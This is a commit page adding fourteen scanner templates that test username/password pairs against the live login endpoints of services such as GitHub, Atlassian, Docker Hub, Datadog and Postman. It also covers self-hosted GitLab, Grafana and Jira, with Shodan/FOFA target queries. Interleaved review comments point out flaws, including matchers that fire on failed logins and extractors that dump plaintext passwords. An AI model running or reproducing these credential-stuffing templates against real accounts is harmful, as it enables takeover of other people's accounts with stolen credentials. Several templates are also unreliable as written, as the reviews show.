added cred template

patch-10
Parth 2023-05-08 22:35:04 +05:30
parent 33d6dcc28c
commit 6bbd3a0936
14 changed files with 677 additions and 0 deletions


@ -0,0 +1,55 @@
id: atechmedia-codebase-login-check
info:
name: Atechmedia/Codebase Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid Atechmedia/Codebase account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,atechmedia,codebase,creds-stuffing
self-contained: true
requests:
- raw:
- |
GET https://identity.atechmedia.com/login HTTP/1.1
Host: identity.atechmedia.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Referer: https://identity.atechmedia.com/login
- |
POST https://identity.atechmedia.com/login HTTP/1.1
Host: identity.atechmedia.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Origin: https://identity.atechmedia.com
Content-Type: application/x-www-form-urlencoded
Referer: https://identity.atechmedia.com/login
Connection: close
utf8=%E2%9C%93&authenticity_token={{url_encode(authenticity_token)}}&username={{username}}&password={{password}}&commit=Login
cookie-reuse: true
extractors:
- type: xpath
name: authenticity_token
part: body
attribute: value
internal: true
xpath:
- /html/body/div/div[2]/div/form/input[2]
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: user_session'
- type: status
status:
- 302
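Review bot: The `dsl` extractor at the end of the `extractors` block emits `password` next to `username`, so every match writes a working plaintext credential pair into the scan output and into whatever stores it (reports, CI logs, tickets). The username alone identifies the affected account; I would drop the `- password` entry and keep `- username`. The same extractor appears in every other template in this commit that has an `extractors` block. Separately, `severity: critical` is set on all fourteen templates although the finding is a reused credential rather than a flaw in the service, so a comment under `info` explaining the rating would help triage.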


@ -0,0 +1,38 @@
id: atlassian-login-check
info:
name: Atlassian Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid atlassian account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,atlassian,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://auth.atlassian.com/co/authenticate HTTP/1.1
Host: auth.atlassian.com
Content-Type: application/json
Origin: https://id.atlassian.com
Referer: https://id.atlassian.com/
Connection: close
{"username":"{{username}}","password":"{{password}}","state":{"csrfToken":"{{rand_text_alpha(10, "")}}"}}
extractors:
- type: dsl
dsl:
- username
- password
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"error_description":"Wrong email or password."'
- type: status
status:
- 403
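Review bot: The matchers fire on the failure response: the word matcher requires `"error_description":"Wrong email or password."` and the status matcher requires `403`, so as written the template reports a finding exactly when the sign-in is rejected. That contradicts the description "Checks for a valid atlassian account", and every result from this file would be a false positive for whoever triages it. The success response is not visible on this page, so the matchers should be rewritten against a response captured from a test account the author owns rather than guessed.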


@ -0,0 +1,37 @@
id: avnil-pdf-generator-check
info:
name: useanvil.com Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid avnil pdf generator account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,avnil-pdf,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://graphql.useanvil.com/ HTTP/1.1
Host: graphql.useanvil.com
Content-Length: 367
Content-Type: application/json
{"operationName":"LoginMutation","variables":{"email":"{{username}}","password":"{{password}}"},"query":"mutation LoginMutation($email: String, $password: String) {\n login(email: $email, password: $password) {\n eid\n firstName\n lastName\n email\n preferences {\n require2FA\n __typename\n }\n extra\n __typename\n }\n}\n"}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"email":"'
- '"eid":"'
- type: status
status:
- 200
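Review bot: `Content-Length: 367` is hard-coded in the raw request although the body length changes with every `{{username}}`/`{{password}}` substitution, so the header is at best ignored and at worst makes the server read a truncated or over-long body and return an unreliable result. I would delete the header line and let the client compute it; the same applies to `Content-Length: 160` in the chefio template, `Content-Length: 48` in the pulmi template and `Content-Length: 186` in the gitlab template. The id, tag and description also spell the product `avnil` while the name and host say `useanvil.com`; `id: anvil-pdf-generator-check` would match.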


@ -0,0 +1,32 @@
id: chefio-login-check
info:
name: Chef.io Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid chef.io account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,chefio,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://api.chef.io/login HTTP/1.1
Host: api.chef.io
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Content-Length: 160
utf8=%E2%9C%93&authenticity_token=&authenticity_token=&to=https://api.chef.io/login-success&username={{username}}&password={{password}}&commit=Sign+In
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Location: https://api.chef.io/login-success'
- type: status
status:
- 302
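Review bot: This is the only template in the commit with no `extractors` block, so a match cannot be attributed to an account when more than one username is supplied. A `dsl` extractor listing only `- username` would make the result attributable without writing the password into the output. The body also sends `authenticity_token=` twice with an empty value and there is no preceding GET, unlike the other form-based templates here; whether the endpoint accepts that should be confirmed against a test account before the matcher is trusted.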


@ -0,0 +1,46 @@
id: codepen-login-check
info:
name: codepen.io Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid codepen account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,codepen,creds-stuffing
self-contained: true
requests:
- raw:
- |
GET https://codepen.io/login HTTP/1.1
Host: codepen.io
- |
POST https://codepen.io/login/login HTTP/1.1
Host: codepen.io
Content-Type: application/x-www-form-urlencoded
X-CSRF-Token: {{token}}
authenticity_token={{token}}&email={{username}}&password={{password}}&login-type=fullpage
extractors:
- type: dsl
dsl:
- username
- password
- type: xpath
part: body
xpath:
- '//input[@name="authenticity_token"]/@value'
name: token
internal: true
matchers-condition: and
matchers:
- type: word
part: body
negative: true
words:
- 'The username or password you entered is incorrect, please try again.'
- type: status
status:
- 302
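Review bot: The match condition has no positive success indicator: it is a `302` status plus a `negative: true` body word, and a redirect response normally carries little or no body, so the negative matcher is satisfied by almost any 302, including a redirect back to the login page. That makes false positives likely. A positive check on the response headers, confirmed against a test account, should replace or accompany the negative one. This template also lacks `cookie-reuse: true` although it takes `authenticity_token` from a prior GET, unlike the other GET-then-POST templates in this commit.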


@ -0,0 +1,52 @@
id: datadog-login-check
info:
name: Datadog Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid datadog account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,datadog,creds-stuffing
self-contained: true
requests:
- raw:
- |
GET https://app.datadoghq.com/account/login HTTP/1.1
Host: app.datadoghq.com
- |
POST https://app.datadoghq.com/account/login? HTTP/1.1
Host: app.datadoghq.com
Content-Type: application/x-www-form-urlencoded
_authentication_token={{auth_token}}&username={{username}}&password={{password}}
cookie-reuse: true
extractors:
- type: regex
name: auth_token
part: body
internal: true
group: 1
regex:
- "authentication_token": "(.*?)","
- type: dsl
dsl:
- username
- password
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Set-Cookie: dogweb='
- type: status
status:
- 302
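Review bot: The regex entry `- "authentication_token": "(.*?)","` is not a single YAML scalar as shown: the first double-quoted string ends after `authentication_token"`, and the trailing `,"` opens a quote that is never closed, so the file should either fail to parse or load a different pattern than intended. Wrapping the whole pattern in single quotes fixes it: `- '"authentication_token": "(.*?)","'`. If the page rendering dropped outer quotes that exist in the file, this can be ignored.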


@ -0,0 +1,49 @@
id: docker-hub-login-check
info:
name: Docker Hub Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid atlassian account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,docker,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://hub.docker.com/v2/users/login HTTP/1.1
Host: hub.docker.com
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.95 Safari/537.36
Connection: close
Content-Type: application/json
{
"username": "{{username}}",
"password": "{{password}}"
}
threads: 30
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'token'
- type: word
part: header
words:
- 'Set-Cookie: token='
- type: status
status:
- 200
extractors:
- type: dsl
dsl:
- username
- password
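Review bot: `threads: 30` appears only in this template, and thirty concurrent sign-in attempts against `hub.docker.com` can trip rate limiting or lock the accounts being checked; I would remove the line so this file behaves like the other thirteen. The description is copied from another file and reads "Checks for a valid atlassian account."; it should be `description: Checks for a valid Docker Hub account.`.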


@ -0,0 +1,36 @@
id: gitea-login-check
info:
name: gitea.com Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid gitea account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,gitea,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://gitea.com/user/login HTTP/1.1
Host: gitea.com
Content-Type: application/x-www-form-urlencoded
user_name={{username}}&password={{password}}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: header
words:
- 'Location: /'
- type: status
status:
- 303
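Review bot: The header word `'Location: /'` is a substring match, so it is satisfied by any redirect to a relative path, for example `Location: /user/login`, and together with `303` it reports a finding whenever the server redirects at all. If a successful sign-in redirects to the site root, a `regex` matcher anchored to the end of the line, such as `'(?m)^Location: /\r?$'`, states that exactly. The actual success response should be confirmed against a test account first.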


@ -0,0 +1,70 @@
id: github-login-check
info:
name: Github Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid github account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,github,creds-stuffing
self-contained: true
requests:
- raw:
- |
GET https://github.com/login HTTP/1.1
Host: github.com
- |
POST https://github.com/session HTTP/1.1
Host: github.com
Origin: https://github.com
Content-Type: application/x-www-form-urlencoded
Referer: https://github.com/login
commit=Sign+in&authenticity_token={{authenticity_token}}&login={{username}}&password={{password}}&trusted_device=&webauthn-support=supported&webauthn-iuvpaa-support=unsupported&return_to=https%3A%2F%2Fgithub.com%2Flogin&allow_signup=&client_id=&integration=&required_field_34b7=&timestamp={{timestamp}}&timestamp_secret={{timestamp_secret}}
cookie-reuse: true
extractors:
- type: xpath
name: authenticity_token
part: body
attribute: value
internal: true
xpath:
- /html/body/div[3]/main/div/div[4]/form/input[1]
- type: xpath
name: timestamp
part: body
attribute: value
internal: true
xpath:
- /html/body/div[3]/main/div/div[4]/form/div/input[10]
- type: xpath
name: timestamp_secret
part: body
attribute: value
internal: true
xpath:
- /html/body/div[3]/main/div/div[4]/form/div/input[11]
- type: dsl
dsl:
- username
- password
matchers-condition: or
matchers:
- type: dsl
name: 2fa
dsl:
- "contains(location, 'https://github.com/sessions/two-factor')"
- "status_code==302"
condition: and
- type: dsl
dsl:
- "contains(to_lower(header), 'set-cookie: logged_in=yes')"
- "contains(to_lower(header), 'set-cookie: user_session=')"
- "status_code==302"
condition: and
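Review bot: All three internal extractors locate their field by absolute position (`/html/body/div[3]/main/div/div[4]/form/input[1]`, `.../form/div/input[10]`, `.../form/div/input[11]`), so any markup change on the login page makes them return nothing or the wrong field, and the POST then goes out with empty or wrong tokens without any error. Selecting by attribute, as the codepen template in this commit does, is stable: `//input[@name="authenticity_token"]` and, assuming the field names equal the POST parameter names, `//input[@name="timestamp"]` and `//input[@name="timestamp_secret"]`. The atechmedia (`/html/body/div/div[2]/div/form/input[2]`) and postman (`/html/body/div/div/div[1]/form/input`) templates have the same problem. The matcher named `2fa` reports accounts that still require a second factor under the same `critical` severity as a full sign-in, which deserves a comment.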


@ -0,0 +1,52 @@
id: postman-login-check
info:
name: Postman Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid postman account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,postman,creds-stuffing
self-contained: true
requests:
- raw:
- |
GET https://identity.getpostman.com/login HTTP/1.1
Host: identity.getpostman.com
Referer: https://identity.getpostman.com/accounts
- |
POST https://identity.getpostman.com/login HTTP/1.1
Host: identity.getpostman.com
Content-Type: application/json;charset=UTF-8
X-Csrf-Token: {{csrfToken}}
Origin: https://identity.getpostman.com
Referer: https://identity.getpostman.com/login
{"username":"{{username}}","password":"{{password}}"}
cookie-reuse: true
attack: pitchfork
extractors:
- type: xpath
name: csrfToken
part: body
attribute: value
internal: true
xpath:
- /html/body/div/div/div[1]/form/input
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(to_lower(header), 'set-cookie: getpostmanlogin=yes')"
- "contains(to_lower(body), 'identity.postman.co/continue')"
- "status_code==200"
condition: and


@ -0,0 +1,43 @@
id: pulmi-login-check
info:
name: pulmi.com Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid github account.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
tags: login-check,pulmi,creds-stuffing
self-contained: true
requests:
- raw:
- |-
POST https://api.pulumi.com/api/console/email/login HTTP/1.1
Host: api.pulumi.com
Content-Length: 48
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Content-Type: application/json
Origin: https://app.pulumi.com
Referer: https://app.pulumi.com/
Connection: close
{"emailOrLogin":"{{username}}","password":"{{password}}"}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- pulumiAccessToken
- userInfo
- type: status
status:
- 200
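Review bot: The metadata does not describe this template: the description says "Checks for a valid github account." while the request targets `api.pulumi.com`, and the id, name and tag spell the product `pulmi`. Proposed: `id: pulumi-login-check`, `name: pulumi.com Login Check`, `description: Checks for a valid Pulumi account.`, with the tag changed to `pulumi`. A wrong product name in the finding sends triage to the wrong owner.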


@ -0,0 +1,66 @@
id: gitlab-login-check-self-hosted
info:
name: Gitlab Login Check Self Hosted
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid login on self hosted Grafana instance.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
shodan-query: product:"GitLab Self-Managed"
fofa-query: product="GitLab"
tags: login-check,gitlab,creds-stuffing,self-hosted
variables:
username: "{{username}}"
password: "{{password}}"
http:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept-Language: en-US,en;q=0.9,de;q=0.8
Connection: close
- |
POST /users/sign_in HTTP/1.1
Host: {{Hostname}}
Content-Length: 186
Cache-Control: max-age=0
Origin: http://{{Hostname}}
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Referer: http://{{Hostname}}/users/sign_in
Accept-Language: en-US,en;q=0.9,de;q=0.8
Connection: close
authenticity_token={{url_encode(authenticity_token)}}&user%5Blogin%5D={{username}}&user%5Bpassword%5D={{password}}&user%5Bremember_me%5D=0
cookie-reuse: true
attack: pitchfork
extractors:
- type: regex
part: body
internal: true
name: authenticity_token
group: 1
regex:
- '"/users/sign_in".*?authenticity_token"\s+value="([^"]+)"'
- type: dsl
dsl:
- username
- password
matchers-condition: and
req-condition: true
matchers:
- type: dsl
dsl:
- status_code_2 == 302
- '!contains(to_lower(body_2), "invalid login")'
condition: and
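Review bot: `Origin: http://{{Hostname}}` and `Referer: http://{{Hostname}}/users/sign_in` hard-code the scheme, so against an HTTPS instance the POST carries an origin that does not match the target; a server that checks it will reject the request and the template will silently report nothing. The grafana template in this commit uses `{{BaseURL}}` for both headers, and `Origin: {{BaseURL}}` with `Referer: {{BaseURL}}/users/sign_in` would do the same here. The description is also copied from the Grafana file and should read `description: Checks for a valid login on self hosted GitLab instance.`. This file uses the top-level key `http:` where the other thirteen use `requests:`; one spelling should be used throughout.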


@ -0,0 +1,56 @@
id: grafana-login-check
info:
name: Grafana Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid login on self hosted Grafana instance.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
shodan-query: title:"Grafana"
fofa-query: title="Grafana"
tags: login-check,grafana,creds-stuffing,self-hosted
variables:
username: "{{username}}"
password: "{{password}}"
requests:
- raw:
- |-
POST /login HTTP/1.1
Host: {{Hostname}}
accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
content-type: application/json
Origin: {{BaseURL}}
Referer: {{BaseURL}}/login
Accept-Language: en-US,en;q=0.9,de;q=0.8
Cookie: redirect_to=%2F
Connection: close
{"user":"{{username}}","password":"{{password}}"}
extractors:
- type: dsl
dsl:
- username
- password
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'Logged in'
- type: word
part: header
words:
- 'grafana_session'
- type: status
status:
- 200
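Review bot: The `variables:` block sets `username: "{{username}}"` and `password: "{{password}}"`, defining each variable in terms of itself; it supplies no value, so the inputs still have to come from outside the template. If the intent is to document the required inputs, a comment such as `# username and password must be supplied at run time` says so without a circular definition. The gitlab and jira templates contain the same block, and both set `attack: pitchfork` while this file does not, which looks like an oversight.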


@ -0,0 +1,45 @@
id: jira-login-check
info:
name: Jira Login Check
author: parthmalhotra, pdresearch
severity: critical
description: Checks for a valid login on self hosted Jira instance.
reference:
- https://owasp.org/www-community/attacks/Credential_stuffing
metadata:
shodan-query: http.component:"Atlassian Jira"
fofa-query: product="JIRA"
tags: login-check,jira,creds-stuffing,self-hosted
variables:
username: "{{username}}"
password: "{{password}}"
requests:
- raw:
- |-
POST /rest/gadget/1.0/login HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: close
os_username={{username}}&os_password={{password}}
extractors:
- type: dsl
dsl:
- username
- password
attack: pitchfork
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"loginSucceeded":true'
- type: status
status:
- 200